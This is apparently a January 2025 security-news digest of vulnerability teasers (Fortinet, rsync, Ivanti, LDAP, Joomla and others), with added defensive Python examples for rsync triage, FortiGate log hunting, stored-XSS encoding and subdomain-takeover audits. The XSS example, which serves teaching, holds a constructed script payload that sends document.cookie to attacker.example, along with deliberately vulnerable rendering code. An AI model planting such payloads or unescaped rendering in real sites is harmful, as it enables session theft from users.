
January 2025

Arctic Wolf Observes Campaign Exploiting SimpleHelp RMM Software for Initial Access

On January 22, 2025, Arctic Wolf began observing a campaign involving unauthorized access to devices running SimpleHelp RMM software as an initial access vector. Roughly a week prior to the emergence of this campaign, several vulnerabilities had been publicly disclosed in SimpleHelp by Horizon3 (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728).

CVE-2025-23006: Actively Exploited Vulnerability in SonicWall SMA1000 Appliances

On January 22, 2025, SonicWall published a security advisory detailing an actively exploited remote command execution vulnerability in SMA1000 appliances. The critical-severity vulnerability, CVE-2025-23006, is a pre-authentication deserialization of untrusted data vulnerability that has been identified in the SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC). If exploited, it could allow unauthenticated remote threat actors to execute arbitrary OS commands.

AI-Powered Attacks Surge: 1,025% Jump in Vulnerabilities, 99% are API related

Wallarm's 2025 API ThreatStats Report offers a sweeping look at how AI deployments drive a surge in security risks. In 2024, Wallarm researchers counted 439 AI-related CVEs, up 1,025% from the prior year. Nearly all of these flaws, 99%, trace back to insecure or mismanaged APIs.

Taking a Threat Adapted Approach to Vulnerability Management

As cyber threats grow in complexity and frequency, vulnerability management requires more than patching systems; it demands a dynamic, threat-adapted approach. As part of Cyber Rhino Threat Week (9-13 December 2024), which aimed to share threat intelligence insights and best practices with our customers, partners and industry ecosystem, we held a session exploring how integrating threat intelligence into vulnerability management can transform the way organisations prioritise and respond to risks.

Stop Demonizing CVSS: Fix the Real Problem

If you read the newest risk-based vulnerability management literature, it appears we have a new favorite punching bag: the Common Vulnerability Scoring System (CVSS). You seemingly can’t throw a rock into the “vuln-o-sphere” without hitting someone dunking on CVSS or the National Vulnerability Database (NVD). The argument goes something like this: “Exploitation rates are up, ransomware is surging, and vulnerabilities are multiplying like rabbits.

How Vulnerability Assessments Help Identify and Address Security Weaknesses

A vulnerability assessment systematically evaluates the security of an organisation’s IT infrastructure, aiming to uncover potential flaws. This process not only identifies weaknesses but also provides a roadmap for addressing these vulnerabilities before they are exploited by malicious actors. Through a series of structured steps, including identification, classification, analysis, and remediation, organisations can significantly enhance their cyber security posture.

ConVErsations: Criminal Discussion of Vulnerabilities and Exploits

Defenders often discuss security vulnerabilities on GitHub, Stack Overflow, X (formerly Twitter) and other platforms to share knowledge of these threats and to make sure users know when patches are available. Cybercriminals have a similar process, sharing vulnerability news and exploit code and holding technical discussions on cybercriminal forums. In contrast to defenders, however, these threat actors share this knowledge for the purpose of finding unpatched systems and exploiting them.

Detecting and mitigating CVE-2024-12084: rsync remote code execution

On Tuesday, January 14, 2025, a set of vulnerabilities affecting the rsync utility was announced. Rsync transfers files and directories locally and remotely and is often used for deployments and backups. In total, six vulnerabilities were announced on the oss-security mailing list. The most severe, CVE-2024-12084, may result in remote code execution. This post covers how to detect and mitigate CVE-2024-12084.

Microsoft Corporation Latest Security Update on Actively Exploited Zero-Day Flaws for Safer Digital Operations

Organizations need to remain vigilant because cyber threats keep evolving. Microsoft's January 2025 security update underlines that urgency: it patches at least 161 vulnerabilities, including three zero-day flaws actively exploited in the wild.

Fortinet Discloses Active Exploitation of Critical Zero-Day Vulnerability: CVE-2024-55591

Note: These vulnerabilities remain under active exploitation and Kroll experts are investigating. If further details are uncovered by our team, updates will be made to the Kroll Cyber Risk blog. A critical authentication bypass vulnerability (CWE-288) affecting FortiOS and FortiProxy (Fortinet advisory FG-IR-24-535) allows remote attackers to obtain super-admin privileges via crafted Node.js WebSocket traffic.

Emerging Threat: Fortinet CVE-2024-55591

On January 14, 2025, Fortinet disclosed a new critical (CVSS 9.6) authentication bypass vulnerability affecting FortiOS and FortiProxy. This vulnerability, CVE-2024-55591, allows unauthenticated remote attackers to target the Node.js WebSocket module of the administrative interface and potentially gain super-admin privileges.

Security Bulletin: CVE-2024-55591 Fortinet - Authentication Bypass

On January 14, 2025, Fortinet confirmed a critical zero-day vulnerability, CVE-2024-55591, in its FortiOS and FortiProxy products that has been actively exploited in the wild. This authentication bypass allows attackers to gain super-admin privileges via crafted requests to the Node.js WebSocket module, enabling unauthorized access to firewalls, rogue administrative account creation and configuration changes.

Aviatrix Controller RCE Vulnerability Allows Unauthenticated Malicious Code Injections (CVE-2024-50603)

AWS and other cloud infrastructure are exposed after attacks were uncovered in the wild. Cloud networking solutions provider Aviatrix has disclosed a new vulnerability (CVE-2024-50603) in its Controller that allows unauthenticated actors to run arbitrary commands. This remote code execution (RCE) vulnerability, rated CVSS 10 (critical), has been exploited in the wild. A patch is available on GitHub; alternatively, users can update to the fixed versions 7.1.4191 or 7.2.4996.

A Step-by-Step Guide to the Remote Code Execution Vulnerability

What if the very core of your company, the digital ecosystem you painstakingly built, is under attack? If an invisible adversary gains unauthorized access and begins manipulating data or disrupting essential processes, your entire organization could be paralyzed in an instant. Remote Code Execution (RCE) vulnerabilities make that scenario possible. RCEs are the holy grail for attackers, allowing them to run arbitrary commands on a target machine.

Multiple Vulnerabilities in Rsync Could be Combined to Achieve RCE

On January 14, 2025, the CERT Coordination Center (CERT/CC) published a security advisory detailing multiple vulnerabilities impacting Rsync. The most severe is CVE-2024-12084, a critical-severity heap-based buffer overflow in the Rsync daemon that allows out-of-bounds writes.
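The two rsync items above both come down to the same two questions for a defender: is the installed rsync below the fixed release, and is the daemon reachable? The script below is an added example, not code from either post. It assumes, from the upstream rsync 3.4.0 release announcement rather than from this page, that all six CVEs are fixed in 3.4.0 and that the heap overflow CVE-2024-12084 affects 3.2.7 <= version < 3.4.0. The `/proc/net/tcp` excerpt is constructed.

```python
"""Version-based triage for the January 2025 rsync CVEs.

Added example; not code from either rsync post summarised above.
Assumptions (from the upstream rsync 3.4.0 release announcement, not this
page): all six CVEs are fixed in rsync 3.4.0, and the heap overflow
CVE-2024-12084 affects 3.2.7 <= version < 3.4.0.
"""
import re
import subprocess
from typing import NamedTuple, Optional, Tuple

FIXED_IN = (3, 4, 0)
HEAP_OVERFLOW_FROM = (3, 2, 7)
RSYNCD_PORT_HEX = f"{873:04X}"   # "0369": how /proc/net/tcp prints port 873

# First line of `rsync --version`: "rsync  version 3.2.7  protocol version 31"
VERSION_RE = re.compile(r"rsync\s+version\s+(\d+)\.(\d+)\.(\d+)")


class Verdict(NamedTuple):
    version: Tuple[int, int, int]
    cve_2024_12084: bool   # inside the heap-overflow range
    needs_update: bool     # below 3.4.0, so at least some of the six CVEs apply
    advice: str


def parse_version(banner: str) -> Optional[Tuple[int, int, int]]:
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def assess(banner: str, distro_backport: bool = False) -> Verdict:
    """Classify one `rsync --version` banner.

    distro_backport: set True when the distribution's package changelog says the
    fix was backported. Distributions often patch without bumping the upstream
    version, so the version number alone then gives a false positive.
    """
    v = parse_version(banner)
    if v is None:
        raise ValueError("unrecognised rsync --version output")
    needs_update = v < FIXED_IN
    heap = HEAP_OVERFLOW_FROM <= v < FIXED_IN
    if needs_update and distro_backport:
        advice = "below 3.4.0 but fix reportedly backported; verify via package changelog"
    elif needs_update:
        advice = "upgrade to rsync >= 3.4.0; until then stop rsyncd and block TCP/873"
    else:
        advice = "at or above 3.4.0"
    return Verdict(v, heap, needs_update, advice)


def rsyncd_listening(proc_net_tcp: str) -> bool:
    """True if the text of /proc/net/tcp shows a LISTEN socket (st=0A) on 873.

    Exposure matters because CVE-2024-12084 is reached through the daemon."""
    for line in proc_net_tcp.splitlines()[1:]:         # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == "0A" and local_addr.rsplit(":", 1)[-1] == RSYNCD_PORT_HEX:
            return True
    return False


def assess_local_host() -> Verdict:
    """Run the version check on this machine (needs rsync on PATH)."""
    banner = subprocess.run(["rsync", "--version"], capture_output=True,
                            text=True, check=True).stdout
    return assess(banner)


# Constructed sample: one LISTEN socket on 0.0.0.0:873 and one established SSH session.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0369 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18211 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 0100007F:C3A4 01 00000000:00000000 00:00000000 00000000     0        0 18305 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    for banner in ("rsync  version 3.2.7  protocol version 31",
                   "rsync  version 3.4.0  protocol version 32"):
        print(assess(banner))
    print("rsyncd listening in sample:", rsyncd_listening(SAMPLE_PROC_NET_TCP))
```

On a fleet, feed `assess()` the banner collected by your inventory tool and `rsyncd_listening()` the contents of `/proc/net/tcp` (and `tcp6`); a host that is both below 3.4.0 and listening on 873 is the one to fix first. Remember the backport caveat: on Debian or RHEL derivatives the package changelog, not the upstream version string, is the authority.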

CVE-2024-55591: Follow up: Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy

On January 14, 2025, Fortinet published a security advisory for CVE-2024-55591, an authentication bypass using an alternate path or channel vulnerability in FortiOS and FortiProxy. A remote threat actor can craft requests to the Node.js websocket module to gain super-admin privileges.

Mitel MiCollab Vulnerabilities: CVE-2024-35286 and CVE-2024-41713

Mitel’s MiCollab Unified Communications solutions are widely used by businesses to streamline communications. However, two critical vulnerabilities, CVE-2024-35286 and CVE-2024-41713, have been identified across several versions of Mitel MiCollab. CVE-2024-35286 has been identified in versions 9.8.0.33 and earlier and CVE-2024-41713 has been identified in versions 9.8 SP1 FP2 (9.8.1.201) and earlier.

Snyk Security Labs Testing Update: Cursor.com AI Code Editor

Snyk’s Security Labs team aims to find and help mitigate vulnerabilities in software used by developers around the world, with an overarching goal to improve the state of software security. We do this by targeting tools developers are using, including new and popular software solutions. With the meteoric rise in AI tooling – specifically the fast-growing field of AI-enabled development environments – we have been including such software in our research cycles.

Snyk Recognized as Trusted Partner and Innovator by JPMorganChase

Snyk is the trusted partner for financial services companies, empowering them to modernize application security while safeguarding critical infrastructure. Backed by industry leaders, we are committed to exceeding expectations, driving innovation, and redefining security for financial services. This is one of the reasons Snyk was recently inducted into JPMorgan Chase’s Hall of Innovation, for our central role in helping them to build the future of banking securely.

Demonstrating reduction of vulnerability classes: a key step in CISA's "Secure by Design" pledge

In today’s rapidly evolving digital landscape, securing software systems has never been more critical. Cyber threats continue to exploit systemic vulnerabilities in widely used technologies, leading to widespread damage and disruption. To address this, the United States Cybersecurity and Infrastructure Security Agency (CISA) helped shape best practices for the technology industry with its Secure by Design pledge.

Your Client Requires NIS2 Vulnerability Patching. Now What?

TL;DR: The new EU cybersecurity directive, NIS2, is already reshaping how software suppliers do business through stricter vulnerability management requirements in procurement contracts. This shift is gaining momentum, and more companies will need to adapt. Aikido helps automate compliance reporting and vulnerability tracking to meet these new demands. Read on to understand what this means for your business.

CVE-2024-55591: Fortinet FortiOS/FortiProxy Zero Day

In late November and December 2024, Arctic Wolf observed evidence of a mass compromise of Fortinet FortiGate devices. While the initial attack vector was unknown at the time, the evidence of compromise (new users and SSL profiles) was consistent across compromised devices. On January 14, Fortinet released a formal statement and patch, and the vulnerability was assigned CVE-2024-55591: an authentication bypass via crafted requests to the Node.js WebSocket module. The CVSSv3 score is 9.6.
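The several CVE-2024-55591 items above describe the outcome (super-admin access, new administrator accounts) but not what that looks like in a FortiGate log. The script below is an added example, not code from Arctic Wolf, Fortinet, Kroll or the other posts. The indicators it looks for come from Fortinet's PSIRT advisory for FG-IR-24-535 rather than from this page: successful admin logins where the `ui` field is `jsconsole` with a spoofed loopback or otherwise implausible source address, and `system.admin` objects added through that console. The log lines are constructed to match the FortiGate key=value format, not real captures.

```python
"""Triage FortiGate system-event logs for CVE-2024-55591 post-exploitation traces.

Added example, not code from any of the posts above. Indicators are taken from
Fortinet's FG-IR-24-535 advisory (not from this page): jsconsole admin logins
with spoofed/implausible source addresses, and admin accounts added via that
console. The sample log lines are constructed.
"""
import ipaddress
import re
from typing import Dict, List

# FortiGate logs are key=value pairs; values are either double-quoted or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_fortigate(line: str) -> Dict[str, str]:
    return {key: quoted if quoted else bare for key, quoted, bare in KV_RE.findall(line)}


def implausible_source(ev: Dict[str, str]) -> bool:
    """Spoofed logins show srcip == dstip, or a loopback/unspecified source."""
    src, dst = ev.get("srcip"), ev.get("dstip")
    if not src:
        return False
    if src == dst:
        return True
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def triage(lines: List[str]) -> List[str]:
    findings: List[str] = []
    for n, line in enumerate(lines, 1):
        ev = parse_fortigate(line)
        if ev.get("type") != "event" or ev.get("subtype") != "system":
            continue
        ui = ev.get("ui", "")
        if (ev.get("logdesc") == "Admin login successful"
                and ui.startswith("jsconsole") and implausible_source(ev)):
            findings.append(f"line {n}: jsconsole login as {ev.get('user')} "
                            f"srcip={ev.get('srcip')} dstip={ev.get('dstip')}")
        if (ev.get("cfgpath") == "system.admin" and ev.get("action") == "Add"
                and ui.startswith("jsconsole")):
            findings.append(f"line {n}: admin account {ev.get('cfgobj')!r} added via {ui}")
    return findings


# Constructed sample log: two benign lines, two that match the indicators.
SAMPLE_LOGS = [
    'date=2024-12-02 time=09:14:03 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="https(10.10.0.5)" method="https" '
    'srcip=10.10.0.5 dstip=10.10.0.1 action="login" status="success"',
    'date=2024-12-02 time=03:12:44 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" '
    'srcip=127.0.0.1 dstip=127.0.0.1 action="login" status="success"',
    'date=2024-12-02 time=03:13:01 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" '
    'cfgpath="system.admin" cfgobj="svc_backup" cfgattr="accprofile[super_admin]"',
    'date=2024-12-02 time=10:02:17 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object attribute configured" user="admin" ui="ssh(10.10.0.5)" action="Edit" '
    'cfgpath="system.admin" cfgobj="admin" cfgattr="password[*]"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding)
```

`jsconsole` is the GUI's embedded CLI widget, so legitimate use of it does appear in logs, with the administrator's real source address; the spoofed-address condition is what separates those from the exploitation pattern. Treat a hit as a trigger to pull the full advisory's indicator list (accounts, SSL VPN changes, firewall policy edits) and the device's configuration history, not as a verdict on its own.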

How Attackers Exploit APIs for Rapid Data Breaches

Attackers now exploit APIs for rapid data breaches, taking advantage of a 96% rise in API-related vulnerabilities. Learn how realized risks (breaches) differ from unrealized risks (vulnerabilities) and why APIs are top targets. Stay informed on API security trends.

CISO predictions: What does 2025 hold for attack surface management (ASM)?

We’ve asked Outpost24’s CISO, Martin Jartelius, what 2025 is likely to hold for organizations using attack surface management (ASM) tools. Here’s what Martin had to say about his predictions for ASM in 2025, as well as some thoughts on how the CISO’s role might change.

Emerging Threat: Ivanti Connect Secure CVE-2025-0282 and CVE-2025-0283

On Wednesday, January 8th, Ivanti disclosed two severe vulnerabilities affecting Ivanti Connect Secure VPN devices. Ivanti Connect Secure is an external-facing SSL VPN used to secure remote access to corporate networks. Ivanti Policy Secure is an internal network-access control solution designed for regulating access within an enterprise’s network. The critical vulnerability (CVSS 9.0) CVE-2025-0282 allows unauthenticated remote code execution (RCE) through a stack-based buffer overflow.

What Is Vulnerability Management?

Enterprise networks frequently experience changes in endpoint devices, software, and files, which can introduce risk to the organization. To mitigate this, companies can implement foundational security controls like file integrity monitoring (FIM), which tracks changes to essential files and helps restore them if unauthorized. Additionally, organizations may use these controls to monitor for vulnerabilities introduced by new devices. However, FIM alone is not enough.

CVSS 3.1 vs CVSS 4.0: A Look at the Data

Like the cost of groceries and everything else, CVSS scores seem to have experienced some inflation recently. CVSS 4.0 promises to be a better calculator of risk than previous iterations of the system, but that’s only true if you use it in its full capacity to calculate your specific risk within your specific environment. Most of us aren’t using it that way.

Ivanti Discloses Active Exploitation of Zero-Day Vulnerability

Ivanti has disclosed vulnerabilities affecting Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) and Ivanti Neurons for Zero Trust Access (ZTA) Gateways. According to Ivanti, CVE-2025-0282 has been exploited on a limited number of ICS appliances. There are no confirmed reports of exploitation for Ivanti Policy Secure or ZTA Gateways. There is no indication that CVE-2025-0283 is actively exploited or chained.

Why Vulnerability Scanning Alone Isn't Enough: The Case for Penetration Testing

Organizations today face a rapidly evolving threat landscape, and as they plan their cybersecurity strategy and budgets, many may struggle with a key question: If I’m conducting regular vulnerability scans, and patching the vulnerabilities I identify, do I really need penetration tests as well? The answer is yes. While vulnerability scanning plays a vital role in identifying risks and vulnerabilities, relying solely on it for security creates blind spots.

Securing GenAI Development with Snyk

From design to deployment, the rise in AI tools and AI-generated code is changing developers’ workflows, enabling them to focus on more creative and complex tasks. However, while 96% of developers use AI coding assistants to streamline their work, it can have a negative impact on security teams. One-fifth of AppSec teams surveyed said they face significant challenges securing AI-generated code due to how quickly it’s produced.

CVE-2025-0282: Critical Zero-Day Remote Code Execution Vulnerability Impacts Several Ivanti Products

On January 8, 2025, Ivanti published a security advisory announcing the patching of a critical, actively exploited vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Tracked as CVE-2025-0282, the vulnerability allows remote unauthenticated threat actors to achieve remote code execution (RCE) via a stack-based buffer overflow flaw. Ivanti confirmed that exploitation has only been observed in Connect Secure, and no exploitation has been reported in Policy Secure or ZTA Gateways.

Notable zero-day vulnerability trends in 2024: Insights and implications

2024 has seen a significant uptick in the discovery and exploitation of zero-day vulnerabilities. These unpatched security flaws present a serious challenge to cybersecurity teams, as attackers can exploit them before any patches are available. As a result, zero-day vulnerabilities have become a go-to tool for cybercriminals aiming to infiltrate enterprise networks.

Emerging Threat: Windows LDAP CVE-2024-49113

CVE-2024-49113, also known as LDAPNightmare, is a high-severity (CVSS score 7.5) unauthenticated denial-of-service (DoS) vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) implementation. It allows attackers to crash any unpatched Windows server whose DNS server can reach the internet, by overwhelming a critical internal component of the operating system. Both CVE-2024-49113 and its companion, the critical RCE vulnerability CVE-2024-49112, were publicized in December 2024.

CIS Control 07: Continuous Vulnerability Management

When it comes to cybersecurity, vulnerability management is one of the older technologies that still play a critical role in securing our assets. It is often overlooked, disregarded, or considered only for checkbox compliance needs, but a proper vulnerability management program can play a critical role in avoiding a series of data breaches. CIS Control 07 provides the minimum requirements and table stakes, if you will, for establishing a successful vulnerability management program.

Stored XSS Vulnerability Discovered in Joomla 5.1.4 - CVE-2024-40748

On September 19th, 2024, a critical vulnerability (CVE-2024-40748) was disclosed in Joomla version 5.1.4, exposing affected websites to stored cross-site scripting (XSS) attacks. Stored XSS (also called second-order or persistent XSS) arises when an application receives data from an untrusted source and unsafely includes it in its later HTTP responses. This lets attackers inject malicious scripts into the website, which execute whenever a user visits the affected page.
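The definition above is the whole bug class in one sentence: stored input replayed into later responses without output encoding. The snippet below is an added example in Python (Joomla itself is PHP), not Joomla code and not from the post; it reproduces the class of defect rather than the specific 5.1.4 issue, and shows why the encoding has to match the output context (a text node versus an attribute value). The payloads and the comment list are constructed.

```python
"""Stored XSS: vulnerable rendering beside context-aware output encoding.

Added example, not Joomla code and not from the post above. It reproduces the
bug class (untrusted stored data copied into later HTML responses), not the
specific Joomla 5.1.4 defect. Payloads and the comment store are constructed.
"""
import html
from typing import List

# Constructed attacker input: stored once, replayed to every later visitor.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.domain)'


def render_comments_vulnerable(comments: List[str]) -> str:
    # Raw interpolation: whatever was stored becomes live markup on every view.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_comments_hardened(comments: List[str]) -> str:
    # Encode for the HTML text-node context at output time, not at storage
    # time, so the same stored value can later be emitted safely elsewhere.
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in comments) + "</ul>"


def render_title_attr_incomplete(title: str) -> str:
    # Escapes <, > and & but leaves quotes alone: fine for a text node,
    # not for an attribute value, which the payload can close and extend.
    return f'<a href="/profile" title="{html.escape(title, quote=False)}">profile</a>'


def render_title_attr_hardened(title: str) -> str:
    # quote=True (the default) also encodes " and ', closing the breakout.
    return f'<a href="/profile" title="{html.escape(title, quote=True)}">profile</a>'


def has_live_handler_or_script(markup: str) -> bool:
    """Crude detector for the demo: a raw <script tag or an injected event handler."""
    lowered = markup.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    stored = ["Nice article!", SCRIPT_PAYLOAD]          # constructed comment store
    print("vulnerable:", render_comments_vulnerable(stored))
    print("hardened:  ", render_comments_hardened(stored))
    print("attr leak: ", render_title_attr_incomplete(ATTR_PAYLOAD))
    print("attr fixed:", render_title_attr_hardened(ATTR_PAYLOAD))
```

Output encoding is the fix for the sink; a Content Security Policy that disallows inline scripts is the defence in depth that limits the damage when one sink is missed. Neither replaces the other, and neither belongs at storage time: encoding on input breaks the data for every other context it will be rendered in.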

10 Docker Security Best Practices

Docker security refers to the build, runtime, and orchestration aspects of Docker containers. It includes the Dockerfile security aspects of Docker base images, as well as the Docker container security runtime aspects—such as user privileges, Docker daemon, proper CPU controls for a container, and further concerns around the orchestration of Docker containers at scale. Docker container security breaks down into four main issues.

Securing the Digital Future: AppSec Best Practices in Digital Banking

On November 12th, 2024, at the Pavilion Hotel in Kuala Lumpur, Snyk’s Field CTO, Pas Apicella, delivered an insightful presentation at the Digital Banking Asia Summit 2024 in Malaysia. Titled, ‘Securing the Digital Future: Best Practices for Application Security in Digital Banking’, his talk focused on actionable strategies to address pressing challenges in the financial services industry.

Looking Back: What We Learned in 2024

Looking back on 2024 to start the new year, we had the great opportunity to host and be part of several conversations and demonstrations that we hope were valuable learning opportunities for everyone who joined us. Let’s take a moment to review some of the highlights from those 2024 events before we leap into 2025.

Cato CTRL Threat Brief: CVE-2024-49112 and CVE-2024-49113 - Windows LDAP Vulnerabilities ("LDAPBleed" and "LDAPNightmare")

In a world where dozens of CVEs are released every day, there are vulnerabilities, and there are vulnerabilities. The latest Microsoft Windows LDAP (Lightweight Directory Access Protocol) vulnerabilities, which were coined not once but twice (“LDAPBleed” and “LDAPNightmare”), clearly belong to the shortlist of new and dangerous CVEs.

Palo Alto Networks Releases Critical Update for PAN-OS DoS Vulnerability

Security teams continuously grapple with the challenges posed by sophisticated cyberattacks. Palo Alto Networks has recently patched a denial-of-service (DoS) vulnerability in its PAN-OS software. Tracked as CVE-2024-3393, this high-severity vulnerability (CVSS score 8.7) poses serious risks to enterprises relying on PAN-OS and Prisma Access for their security infrastructure.

Threat Context Monthly: Executive intelligence briefing for December 2024

Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from December.

How to protect your site from subdomain takeover

Subdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers and tech solution vendors, domains also form a critical component of their product offerings.
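A subdomain takeover needs a record you still publish that points at something you no longer control. The audit below is an added example, not code from the post: it takes an export of your zone's CNAME records and flags the two preconditions, a target that no longer resolves at all, and a target that still resolves but answers with the hosting provider's "nothing claimed here" page. The zone, the resolver answers, the HTTP bodies and the fingerprint marker are constructed for the demo; against real providers, use a maintained fingerprint list and the live `target_resolves()` check.

```python
"""Dangling-CNAME audit for subdomain takeover exposure.

Added example, not code from the post above. All demo data (zone records,
which targets resolve, response bodies, fingerprint marker) is constructed.
"""
import socket
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Optional


@dataclass(frozen=True)
class Cname:
    name: str    # record owner, e.g. shop.example.com
    target: str  # record data, e.g. shop-123.provider.example


@dataclass(frozen=True)
class Finding:
    name: str
    target: str
    reason: str


def target_resolves(fqdn: str) -> bool:
    """Live DNS check (network required): does the CNAME target still exist?"""
    try:
        socket.getaddrinfo(fqdn, None)
        return True
    except socket.gaierror:
        return False


def audit_cnames(records: Iterable[Cname],
                 resolves: Callable[[str], bool],
                 fetch_body: Optional[Callable[[str], str]] = None,
                 fingerprints: Optional[Dict[str, str]] = None) -> List[Finding]:
    findings: List[Finding] = []
    for rec in records:
        if not resolves(rec.target):
            findings.append(Finding(rec.name, rec.target,
                            "target does not resolve; delete the CNAME or re-register the target"))
            continue
        # Many hosting providers keep the hostname resolvable and serve an error
        # page until someone (possibly an attacker) claims the name.
        if fetch_body and fingerprints:
            body = fetch_body(rec.name)
            for marker, provider in fingerprints.items():
                if marker in body:
                    findings.append(Finding(rec.name, rec.target,
                                    f"target resolves but serves {provider}'s unclaimed page"))
                    break
    return findings


# --- constructed demo data --------------------------------------------------
ZONE = [
    Cname("shop.example.com", "shop-4421.saas-host.test"),       # vendor contract ended
    Cname("docs.example.com", "example-docs.pages-host.test"),   # project deleted
    Cname("www.example.com", "edge-17.cdn-host.test"),           # healthy
]
RESOLVABLE = {"example-docs.pages-host.test", "edge-17.cdn-host.test"}
BODIES = {
    "docs.example.com": "<h1>404</h1><p>There isn't a site configured at this address.</p>",
    "www.example.com": "<html><body>Welcome to Example Corp</body></html>",
}
FINGERPRINTS = {"There isn't a site configured at this address": "pages-host (demo marker)"}


def demo() -> List[Finding]:
    return audit_cnames(ZONE, RESOLVABLE.__contains__,
                        lambda host: BODIES.get(host, ""), FINGERPRINTS)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.name} -> {f.target}: {f.reason}")
```

The NXDOMAIN check alone misses the more common case: a provider that keeps answering for the hostname and merely tells visitors the site is unclaimed. That is why the second pass fetches the page and matches provider fingerprints. Run the audit from your DNS provider's export on a schedule, and treat decommissioning a vendor or deleting a project as a trigger to remove the DNS record first.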

LDAPNightmare: SafeBreach Labs Publishes First Proof-of-Concept Exploit for CVE-2024-49113

SafeBreach Labs researchers have developed a zero-click PoC exploit that crashes unpatched Windows servers using the Windows Lightweight Directory Access Protocol (LDAP) vulnerability CVE-2024-49113, the denial-of-service companion to the RCE flaw CVE-2024-49112. Active Directory Domain Controllers (DCs) are considered to be among the crown jewels of organizational computer networks. Vulnerabilities found in DCs are usually much more critical than those found in ordinary workstations.

New year, new security goals: Improve your AppSec in 2025

As the clock ticks closer to 2025, we’re all trying to brainstorm goals and resolutions for the new year. But unlike the annual pledge to exercise more and eat fewer sweets around the holidays (whoops), application security is one area where nobody can afford to slip up. Let’s skip the procrastination phase and hit the ground running with some practical New Year’s resolutions that will help you step up your AppSec game.

What Is Vulnerability Scanning? (Comprehensive Guide)

Vulnerability scanning is the process of assessing web applications, mobile apps, APIs, systems, networks, or cloud infrastructures to identify security weaknesses. It uses automated tools to detect known CVEs (Common Vulnerabilities and Exposures), misconfigurations, and potential attack vectors, helping to secure assets against cyber threats.